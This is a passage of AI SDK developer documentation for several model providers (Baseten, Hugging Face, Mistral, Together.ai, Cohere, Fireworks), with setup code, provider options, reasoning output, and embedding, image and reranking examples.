const model = baseten('moonshotai/Kimi-K2-Instruct-0905');

Example

You can use Baseten language models to generate text with the generateText function:

import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';

const { text } = await generateText({
  model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
  prompt: 'What is the meaning of life? Answer in one sentence.',
});

Baseten language models can also be used in the streamText function (see AI SDK Core).

Dedicated Models

Baseten supports dedicated model URLs for both chat and embedding models. You have to specify a modelURL when creating the provider:

OpenAI-Compatible Endpoints (`/sync/v1`)

For models deployed with Baseten's OpenAI-compatible endpoints:

import { createBaseten } from '@ai-sdk/baseten';

const baseten = createBaseten({
  modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync/v1',
});
// No modelId is needed because we specified modelURL
const model = baseten();
const { text } = await generateText({
  model: model,
  prompt: 'Say hello from a Baseten chat model!',
});

`/predict` Endpoints

/predict endpoints are currently NOT supported for chat models. You must use /sync/v1 endpoints for chat functionality.

Embedding Models

import { createBaseten } from '@ai-sdk/baseten';
import { embed, embedMany } from 'ai';

const baseten = createBaseten({
  modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync',
});

const embeddingModel = baseten.embeddingModel();

// Single embedding
const { embedding } = await embed({
  model: embeddingModel,
  value: 'sunny day at the beach',
});

// Batch embeddings
const { embeddings } = await embedMany({
  model: embeddingModel,
  values: [
    'sunny day at the beach',
    'rainy afternoon in the city',
    'snowy mountain peak',
  ],
});

Endpoint Support for Embeddings

Supported:

/sync endpoints (Performance Client automatically adds /v1/embeddings)
/sync/v1 endpoints (automatically strips /v1 before passing to Performance Client)

Not Supported:

/predict endpoints (not compatible with Performance Client)

Performance Features

The embedding implementation includes:

High-performance client: Uses @basetenlabs/performance-client for optimal performance
Automatic batching: Efficiently handles multiple texts in a single request
Connection reuse: Performance Client is created once and reused for all requests
Built-in retries: Automatic retry logic for failed requests

Error Handling

The Baseten provider includes built-in error handling for common API errors:

import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';

try {
  const { text } = await generateText({
    model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
    prompt: 'Hello, world!',
  });
} catch (error) {
  console.error('Baseten API error:', error.message);
}

Common Error Scenarios

// Embeddings require a modelURL
try {
  baseten.embeddingModel();
} catch (error) {
  // Error: "No model URL provided for embeddings. Please set modelURL option for embeddings."
}

// /predict endpoints are not supported for chat models
try {
  const baseten = createBaseten({
    modelURL:
      'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
  });
  baseten(); // This will throw an error
} catch (error) {
  // Error: "Not supported. You must use a /sync/v1 endpoint for chat models."
}

// /sync/v1 endpoints are now supported for embeddings
const baseten = createBaseten({
  modelURL:
    'https://model-{MODEL_ID}.api.baseten.co/environments/production/sync/v1',
});
const embeddingModel = baseten.embeddingModel(); // This works fine!

// /predict endpoints are not supported for embeddings
try {
  const baseten = createBaseten({
    modelURL:
      'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
  });
  baseten.embeddingModel(); // This will throw an error
} catch (error) {
  // Error: "Not supported. You must use a /sync or /sync/v1 endpoint for embeddings."
}

// Image models are not supported
try {
  baseten.imageModel('test-model');
} catch (error) {
  // Error: NoSuchModelError for imageModel
}

title: Hugging Face description: Learn how to use Hugging Face Provider.

Hugging Face Provider

The Hugging Face provider offers access to thousands of language models through Hugging Face Inference Providers, including models from Meta, DeepSeek, Qwen, and more.

API keys can be obtained from Hugging Face Settings.

Setup

The Hugging Face provider is available via the @ai-sdk/huggingface module. You can install it with:

Provider Instance

You can import the default provider instance huggingface from @ai-sdk/huggingface:

import { huggingface } from '@ai-sdk/huggingface';

For custom configuration, you can import createHuggingFace and create a provider instance with your settings:

import { createHuggingFace } from '@ai-sdk/huggingface';

const huggingface = createHuggingFace({
  apiKey: process.env.HUGGINGFACE_API_KEY ?? '',
});

You can use the following optional settings to customize the Hugging Face provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://router.huggingface.co/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the HUGGINGFACE_API_KEY environment variable. You can get your API key from Hugging Face Settings.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';

const { text } = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .responses() or .languageModel() factory methods:

const model = huggingface.responses('deepseek-ai/DeepSeek-V3-0324');
// or
const model = huggingface.languageModel('moonshotai/Kimi-K2-Instruct');

Hugging Face language models can be used in the streamText function (see AI SDK Core).

You can explore the latest and trending models with their capabilities, context size, throughput and pricing on the Hugging Face Inference Models page.

Provider Options

Hugging Face language models support provider-specific options that you can pass via providerOptions.huggingface:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';

const { text } = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-R1'),
  prompt: 'Explain the theory of relativity.',
  providerOptions: {
    huggingface: {
      reasoningEffort: 'high',
      instructions: 'Respond in a clear and educational manner.',
    },
  },
});

The following provider options are available:

metadata Record<string, string>

Additional metadata to include with the request.
instructions string

Instructions for the model. Can be used to provide additional context or guidance.
strictJsonSchema boolean

Whether to use strict JSON schema validation for structured outputs. Defaults to false.
reasoningEffort string

Controls the reasoning effort for reasoning models like DeepSeek-R1. Higher values result in more thorough reasoning.

Reasoning Output

For reasoning models like deepseek-ai/DeepSeek-R1, you can control the reasoning effort and access the model's reasoning process in the response:

import { huggingface } from '@ai-sdk/huggingface';
import { streamText } from 'ai';

const result = streamText({
  model: huggingface('deepseek-ai/DeepSeek-R1'),
  prompt: 'How many r letters are in the word strawberry?',
  providerOptions: {
    huggingface: {
      reasoningEffort: 'high',
    },
  },
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(`Reasoning: ${part.textDelta}`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

For non-streaming calls with generateText, the reasoning content is available in the reasoning field of the response:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';

const result = await generateText({
  model: huggingface('deepseek-ai/DeepSeek-R1'),
  prompt: 'What is 25 * 37?',
  providerOptions: {
    huggingface: {
      reasoningEffort: 'medium',
    },
  },
});

console.log('Reasoning:', result.reasoning);
console.log('Answer:', result.text);

Image Input

For vision-capable models like Qwen/Qwen2.5-VL-7B-Instruct, you can pass images as part of the message content:

import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
import { readFileSync } from 'fs';

const result = await generateText({
  model: huggingface('Qwen/Qwen2.5-VL-7B-Instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe this image in detail.' },
        {
          type: 'image',
          image: readFileSync('./image.png'),
        },
      ],
    },
  ],
});

You can also pass image URLs:

{
  type: 'image',
  image: 'https://example.com/image.png',
}

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Llama-3.1-8B-Instruct`
`meta-llama/Llama-3.1-70B-Instruct`
`meta-llama/Llama-3.3-70B-Instruct`
`meta-llama/Llama-4-Maverick-17B-128E-Instruct`
`deepseek-ai/DeepSeek-V3.1`
`deepseek-ai/DeepSeek-V3-0324`
`deepseek-ai/DeepSeek-R1`
`deepseek-ai/DeepSeek-R1-Distill-Llama-70B`
`Qwen/Qwen3-32B`
`Qwen/Qwen3-Coder-480B-A35B-Instruct`
`Qwen/Qwen2.5-VL-7B-Instruct`
`google/gemma-3-27b-it`
`moonshotai/Kimi-K2-Instruct`

title: Mistral AI description: Learn how to use Mistral.

Mistral AI Provider

The Mistral AI provider contains language model support for the Mistral chat API.

Setup

The Mistral provider is available in the @ai-sdk/mistral module. You can install it with

Provider Instance

You can import the default provider instance mistral from @ai-sdk/mistral:

import { mistral } from '@ai-sdk/mistral';

If you need a customized setup, you can import createMistral from @ai-sdk/mistral and create a provider instance with your settings:

import { createMistral } from '@ai-sdk/mistral';

const mistral = createMistral({
  // custom settings
});

You can use the following optional settings to customize the Mistral provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.mistral.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Mistral chat API using a provider instance. The first argument is the model id, e.g. mistral-large-latest. Some Mistral chat models support tool calls.

const model = mistral('mistral-large-latest');

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
const model = mistral('mistral-large-latest');

await generateText({
  model,
  providerOptions: {
    mistral: {
      safePrompt: true, // optional safety prompt injection
      parallelToolCalls: false, // disable parallel tool calls (one tool per response)
    } satisfies MistralLanguageModelOptions,
  },
});

The following optional provider options are available for Mistral models:

safePrompt boolean

Whether to inject a safety prompt before all conversations.

Defaults to false.
documentImageLimit number

Maximum number of images to process in a document.
documentPageLimit number

Maximum number of pages to process in a document.
strictJsonSchema boolean

Whether to use strict JSON schema validation for structured outputs. Only applies when a schema is provided and only sets the strict flag in addition to using Custom Structured Outputs, which is used by default if a schema is provided.

Defaults to false.
structuredOutputs boolean

Whether to use structured outputs. When enabled, tool calls and object generation will be strict and follow the provided schema.

Defaults to true.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. When set to false, the model will use at most one tool per response.

Defaults to true.

Document OCR

Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const result = await generateText({
  model: mistral('mistral-small-latest'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
          ),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
  // optional settings:
  providerOptions: {
    mistral: {
      documentImageLimit: 8,
      documentPageLimit: 64,
    } satisfies MistralLanguageModelOptions,
  },
});

Reasoning Models

Mistral offers reasoning models that provide step-by-step thinking capabilities:

magistral-small-2507: Smaller reasoning model for efficient step-by-step thinking
magistral-medium-2507: More powerful reasoning model balancing performance and cost

These models return structured reasoning content that the AI SDK extracts automatically. The reasoning is available via the reasoningText property in the result:

import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const result = await generateText({
  model: mistral('magistral-small-2507'),
  prompt: 'What is 15 * 24?',
});

console.log('REASONING:', result.reasoningText);
// Output: "Let me calculate this step by step..."

console.log('ANSWER:', result.text);
// Output: "360"

The SDK automatically parses Mistral's native reasoning format and provides separate reasoningText and text properties in the result. No middleware is needed.

Configurable Reasoning

Some Mistral models support configurable reasoning, which you can control via the reasoning parameter. You can use the AI SDK's top-level reasoning setting to control reasoning effort:

import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const result = await generateText({
  model: mistral('mistral-small-latest'),
  reasoning: 'high',
  prompt: 'What is 15 * 24?',
});

console.log('REASONING:', result.reasoningText);
console.log('ANSWER:', result.text);

So far, Mistral only supports 'high' and 'none' as effort levels.

Example

You can use Mistral language models to generate text with the generateText function:

import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';

const { text } = await generateText({
  model: mistral('mistral-large-latest'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Mistral language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Structured Outputs

import { mistral } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: mistral('mistral-large-latest'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(z.string()),
        instructions: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a simple pasta recipe.',
});

console.log(JSON.stringify(result.output, null, 2));

You can enable strict JSON Schema validation using a provider option:

import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: mistral('mistral-large-latest'),
  providerOptions: {
    mistral: {
      strictJsonSchema: true,
    } satisfies MistralLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      title: z.string(),
      items: z.array(
        z.object({ id: z.string(), qty: z.number().int().min(1) }),
      ),
    }),
  }),
  prompt: 'Generate a small shopping list.',
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`pixtral-large-latest`
`mistral-large-latest`
`mistral-medium-latest`
`mistral-medium-2508`
`mistral-medium-2505`
`mistral-small-latest`
`magistral-small-2507`
`magistral-medium-2507`
`magistral-small-2506`
`magistral-medium-2506`
`ministral-3b-latest`
`ministral-8b-latest`
`pixtral-12b-2409`
`open-mistral-7b`
`open-mixtral-8x7b`
`open-mixtral-8x22b`

Embedding Models

You can create models that call the Mistral embeddings API using the .embedding() factory method.

const model = mistral.embedding('mistral-embed');

You can use Mistral embedding models to generate embeddings with the embed function:

import { mistral } from '@ai-sdk/mistral';
import { embed } from 'ai';

const { embedding } = await embed({
  model: mistral.embedding('mistral-embed'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Default Dimensions
`mistral-embed`	1024

title: Together.ai description: Learn how to use Together.ai's models with the AI SDK.

Together.ai Provider

The Together.ai provider contains support for 200+ open-source models through the Together.ai API.

Setup

The Together.ai provider is available via the @ai-sdk/togetherai module. You can install it with

Provider Instance

You can import the default provider instance togetherai from @ai-sdk/togetherai:

import { togetherai } from '@ai-sdk/togetherai';

If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai and create a provider instance with your settings:

import { createTogetherAI } from '@ai-sdk/togetherai';

const togetherai = createTogetherAI({
  apiKey: process.env.TOGETHER_API_KEY ?? '',
});

You can use the following optional settings to customize the Together.ai provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.together.xyz/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the TOGETHER_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Together.ai models using a provider instance. The first argument is the model id, e.g. google/gemma-2-9b-it.

const model = togetherai('google/gemma-2-9b-it');

Reasoning Models

import { togetherai } from '@ai-sdk/togetherai';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: togetherai('deepseek-ai/DeepSeek-R1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Together.ai language models to generate text with the generateText function:

import { togetherai } from '@ai-sdk/togetherai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: togetherai('meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Together.ai language models can also be used in the streamText function (see AI SDK Core).

The Together.ai provider also supports completion models via (following the above example code) togetherai.completionModel() and embedding models via togetherai.embeddingModel().

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`moonshotai/Kimi-K2.5`
`Qwen/Qwen3.5-397B-A17B`
`MiniMaxAI/MiniMax-M2.5`
`zai-org/GLM-5`
`deepseek-ai/DeepSeek-V3.1`
`openai/gpt-oss-120b`
`openai/gpt-oss-20b`
`meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8`

Image Models

You can create Together.ai image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { togetherai } from '@ai-sdk/togetherai';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
});

You can pass optional provider-specific request parameters using the providerOptions argument.

import {
  togetherai,
  type TogetherAIImageModelOptions,
} from '@ai-sdk/togetherai';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-dev'),
  prompt: 'A delighted resplendent quetzal mid flight amidst raindrops',
  size: '512x512',
  // Optional additional provider-specific request parameters
  providerOptions: {
    togetherai: {
      steps: 40,
    } satisfies TogetherAIImageModelOptions,
  },
});

The following provider options are available:

steps number

Number of generation steps. Higher values can improve quality.
guidance number

Guidance scale for image generation.
negative_prompt string

Negative prompt to guide what to avoid.
disable_safety_checker boolean

Disable the safety checker for image generation. When true, the API will not reject images flagged as potentially NSFW. Not available for Flux Schnell Free and Flux Pro models.

Image Editing

Together AI supports image editing through FLUX Kontext models. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  size: '1024x1024',
  providerOptions: {
    togetherai: {
      steps: 28,
    } satisfies TogetherAIImageModelOptions,
  },
});

Editing with URL Reference

You can also pass image URLs directly:

const { images } = await generateImage({
  model: togetherai.image('black-forest-labs/FLUX.1-kontext-pro'),
  prompt: {
    text: 'Make the background a lush rainforest',
    images: ['https://example.com/photo.png'],
  },
  size: '1024x1024',
  providerOptions: {
    togetherai: {
      steps: 28,
    } satisfies TogetherAIImageModelOptions,
  },
});

Supported Image Editing Models

Model	Description
`black-forest-labs/FLUX.1-kontext-pro`	Production quality, balanced speed
`black-forest-labs/FLUX.1-kontext-max`	Maximum image fidelity
`black-forest-labs/FLUX.1-kontext-dev`	Development and experimentation

Model Capabilities

Available Models
`stabilityai/stable-diffusion-xl-base-1.0`
`black-forest-labs/FLUX.1-dev`
`black-forest-labs/FLUX.1-dev-lora`
`black-forest-labs/FLUX.1-schnell`
`black-forest-labs/FLUX.1-canny`
`black-forest-labs/FLUX.1-depth`
`black-forest-labs/FLUX.1-redux`
`black-forest-labs/FLUX.1.1-pro`
`black-forest-labs/FLUX.1-pro`
`black-forest-labs/FLUX.1-schnell-Free`
`black-forest-labs/FLUX.1-kontext-pro`
`black-forest-labs/FLUX.1-kontext-max`
`black-forest-labs/FLUX.1-kontext-dev`

Embedding Models

You can create Together.ai embedding models using the .embeddingModel() factory method. For more on embedding models with the AI SDK see embed().

import { togetherai } from '@ai-sdk/togetherai';
import { embed } from 'ai';

const { embedding } = await embed({
  model: togetherai.embeddingModel('togethercomputer/m2-bert-80M-2k-retrieval'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`BAAI/bge-large-en-v1.5`	1024	512
`Alibaba-NLP/gte-modernbert-base`	768	8192
`intfloat/multilingual-e5-large-instruct`	1024	514

Reranking Models

You can create Together.ai reranking models using the .reranking() factory method. For more on reranking with the AI SDK see rerank().

import { togetherai } from '@ai-sdk/togetherai';
import { rerank } from 'ai';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
  documents,
  query: 'talk about rain',
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Together.ai reranking models support additional provider options for object documents. You can specify which fields to use for ranking:

import {
  togetherai,
  type TogetherAIRerankingModelOptions,
} from '@ai-sdk/togetherai';
import { rerank } from 'ai';

const documents = [
  {
    from: 'Paul Doe',
    subject: 'Follow-up',
    text: 'We are happy to give you a discount of 20%.',
  },
  {
    from: 'John McGill',
    subject: 'Missing Info',
    text: 'Here is the pricing from Oracle: $5000/month',
  },
];

const { ranking } = await rerank({
  model: togetherai.reranking('mixedbread-ai/Mxbai-Rerank-Large-V2'),
  documents,
  query: 'Which pricing did we get from Oracle?',
  providerOptions: {
    togetherai: {
      rankFields: ['from', 'subject', 'text'], // Specify which fields to rank by
    } satisfies TogetherAIRerankingModelOptions,
  },
});

The following provider options are available:

rankFields string[]

Array of field names to use for ranking when documents are JSON objects. If not specified, all fields are used.

Model Capabilities

Model
`mixedbread-ai/Mxbai-Rerank-Large-V2`

title: Cohere description: Learn how to use the Cohere provider for the AI SDK.

Cohere Provider

The Cohere provider contains language and embedding model support for the Cohere chat API.

Setup

The Cohere provider is available in the @ai-sdk/cohere module. You can install it with

Provider Instance

You can import the default provider instance cohere from @ai-sdk/cohere:

import { cohere } from '@ai-sdk/cohere';

If you need a customized setup, you can import createCohere from @ai-sdk/cohere and create a provider instance with your settings:

import { createCohere } from '@ai-sdk/cohere';

const cohere = createCohere({
  // custom settings
});

You can use the following optional settings to customize the Cohere provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.cohere.com/v2.
apiKey string

API key that is being sent using the Authorization header. It defaults to the COHERE_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
generateId () => string

Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.

Language Models

You can create models that call the Cohere chat API using a provider instance. The first argument is the model id, e.g. command-r-plus. Some Cohere chat models support tool calls.

const model = cohere('command-r-plus');

Example

You can use Cohere language models to generate text with the generateText function:

import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cohere('command-r-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cohere language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`command-a-03-2025`
`command-a-reasoning-08-2025`
`command-r7b-12-2024`
`command-r-plus-04-2024`
`command-r-plus`
`command-r-08-2024`
`command-r-03-2024`
`command-r`
`command`
`command-nightly`
`command-light`
`command-light-nightly`

Reasoning

Cohere has introduced reasoning with the command-a-reasoning-08-2025 model. You can learn more at https://docs.cohere.com/docs/reasoning.

import { cohere, type CohereLanguageModelOptions } from '@ai-sdk/cohere';
import { generateText } from 'ai';

async function main() {
  const { text, reasoning } = await generateText({
    model: cohere('command-a-reasoning-08-2025'),
    prompt:
      "Alice has 3 brothers and she also has 2 sisters. How many sisters does Alice's brother have?",
    // optional: reasoning options
    providerOptions: {
      cohere: {
        thinking: {
          type: 'enabled',
          tokenBudget: 100,
        },
      } satisfies CohereLanguageModelOptions,
    },
  });

  console.log(reasoning);
  console.log(text);
}

main().catch(console.error);

Embedding Models

You can create models that call the Cohere embed API using the .embedding() factory method.

const model = cohere.embedding('embed-english-v3.0');

You can use Cohere embedding models to generate embeddings with the embed function:

import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';

const { embedding } = await embed({
  model: cohere.embedding('embed-english-v3.0'),
  value: 'sunny day at the beach',
  providerOptions: {
    cohere: {
      inputType: 'search_document',
    } satisfies CohereEmbeddingModelOptions,
  },
});

Cohere embedding models support additional provider options that can be passed via providerOptions.cohere:

import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';

const { embedding } = await embed({
  model: cohere.embedding('embed-english-v3.0'),
  value: 'sunny day at the beach',
  providerOptions: {
    cohere: {
      inputType: 'search_document',
      truncate: 'END',
    } satisfies CohereEmbeddingModelOptions,
  },
});

The following provider options are available:

inputType 'search_document' | 'search_query' | 'classification' | 'clustering'

Specifies the type of input passed to the model. Default is search_query.
- search_document: Used for embeddings stored in a vector database for search use-cases.
- search_query: Used for embeddings of search queries run against a vector DB to find relevant documents.
- classification: Used for embeddings passed through a text classifier.
- clustering: Used for embeddings run through a clustering algorithm.
truncate 'NONE' | 'START' | 'END'

Specifies how the API will handle inputs longer than the maximum token length. Default is END.
- NONE: If selected, when the input exceeds the maximum input token length will return an error.
- START: Will discard the start of the input until the remaining input is exactly the maximum input token length for the model.
- END: Will discard the end of the input until the remaining input is exactly the maximum input token length for the model.

Model Capabilities

Model	Embedding Dimensions
`embed-english-v3.0`	1024
`embed-multilingual-v3.0`	1024
`embed-english-light-v3.0`	384
`embed-multilingual-light-v3.0`	384
`embed-english-v2.0`	4096
`embed-english-light-v2.0`	1024
`embed-multilingual-v2.0`	768

Reranking Models

You can create models that call the Cohere rerank API using the .reranking() factory method.

const model = cohere.reranking('rerank-v3.5');

You can use Cohere reranking models to rerank documents with the rerank function:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'talk about rain',
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Cohere reranking models support additional provider options that can be passed via providerOptions.cohere:

import { cohere, type CohereRerankingModelOptions } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  providerOptions: {
    cohere: {
      maxTokensPerDoc: 1000,
      priority: 1,
    } satisfies CohereRerankingModelOptions,
  },
});

The following provider options are available:

maxTokensPerDoc number

Maximum number of tokens per document. Default is 4096.
priority number

Priority of the request. Default is 0.

Model Capabilities

Model
`rerank-v3.5`
`rerank-english-v3.0`
`rerank-multilingual-v3.0`

title: Fireworks description: Learn how to use Fireworks models with the AI SDK.

Fireworks Provider

Fireworks is a platform for running and testing LLMs through their API.

Setup

The Fireworks provider is available via the @ai-sdk/fireworks module. You can install it with

Provider Instance

You can import the default provider instance fireworks from @ai-sdk/fireworks:

import { fireworks } from '@ai-sdk/fireworks';

If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks and create a provider instance with your settings:

import { createFireworks } from '@ai-sdk/fireworks';

const fireworks = createFireworks({
  apiKey: process.env.FIREWORKS_API_KEY ?? '',
});

You can use the following optional settings to customize the Fireworks provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.fireworks.ai/inference/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FIREWORKS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Fireworks models using a provider instance. The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:

const model = fireworks('accounts/fireworks/models/firefunction-v1');

Reasoning Models

import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Fireworks language models to generate text with the generateText function:

import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text } = await generateText({
  model: fireworks('accounts/fireworks/models/firefunction-v1'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Fireworks language models can also be used in the streamText function (see AI SDK Core).

Provider Options

Fireworks chat models support additional provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

import {
  fireworks,
  type FireworksLanguageModelOptions,
} from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text, reasoningText } = await generateText({
  model: fireworks('accounts/fireworks/models/kimi-k2p5'),
  providerOptions: {
    fireworks: {
      thinking: { type: 'enabled', budgetTokens: 4096 },
      reasoningHistory: 'interleaved',
    } satisfies FireworksLanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

The following optional provider options are available for Fireworks chat models:

thinking object

Configuration for thinking/reasoning models like Kimi K2.5.
- type 'enabled' | 'disabled'
  
  Whether to enable thinking mode.
- budgetTokens number
  
  Maximum number of tokens for thinking (minimum 1024).
reasoningHistory 'disabled' | 'interleaved' | 'preserved'

Controls how reasoning history is handled in multi-turn conversations:
- 'disabled': Remove reasoning from history
- 'interleaved': Include reasoning between tool calls within a single turn
- 'preserved': Keep all reasoning in history

Completion Models

You can create models that call the Fireworks completions API using the .completionModel() factory method:

const model = fireworks.completionModel(
  'accounts/fireworks/models/firefunction-v1',
);

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`accounts/fireworks/models/firefunction-v1`
`accounts/fireworks/models/deepseek-r1`
`accounts/fireworks/models/deepseek-v3`
`accounts/fireworks/models/llama-v3p1-405b-instruct`
`accounts/fireworks/models/llama-v3p1-8b-instruct`
`accounts/fireworks/models/llama-v3p2-3b-instruct`
`accounts/fireworks/models/llama-v3p3-70b-instruct`
`accounts/fireworks/models/mixtral-8x7b-instruct`
`accounts/fireworks/models/mixtral-8x7b-instruct-hf`
`accounts/fireworks/models/mixtral-8x22b-instruct`
`accounts/fireworks/models/qwen2p5-coder-32b-instruct`
`accounts/fireworks/models/qwen2p5-72b-instruct`
`accounts/fireworks/models/qwen-qwq-32b-preview`
`accounts/fireworks/models/qwen2-vl-72b-instruct`
`accounts/fireworks/models/llama-v3p2-11b-vision-instruct`
`accounts/fireworks/models/qwq-32b`
